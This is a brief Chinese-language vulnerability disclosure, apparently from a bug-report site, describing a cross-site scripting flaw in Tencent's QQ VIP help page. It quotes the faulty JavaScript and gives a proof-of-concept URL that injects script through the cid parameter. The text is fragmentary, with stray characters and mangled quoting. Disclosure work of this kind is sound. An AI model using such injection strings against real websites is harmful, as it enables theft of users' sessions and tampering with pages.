简要描述:腾讯QQ会员帮助XSS
详细说明:document.write();
return (cid == "") ? "/special/vip/info/"+sid+".html" : "/special/vip/category/"+cid+"_1.html";
X,
腾讯QQ会员帮助跨站及修复
。漏洞证明:
html?cid=1687"+loadFrame()+"%20id="iframe_faq"%"20name="iframe_faq"%20allowTransparency="true"%">http://service.qq.com/special/vip/vip_faq.html?cid=1687"+loadFrame()+"%20id="iframe_faq"%"20name="iframe_faq"%20allowTransparency="true"%
20scrolling="no"%20frameborder="0"%20onload="rstIfm(this););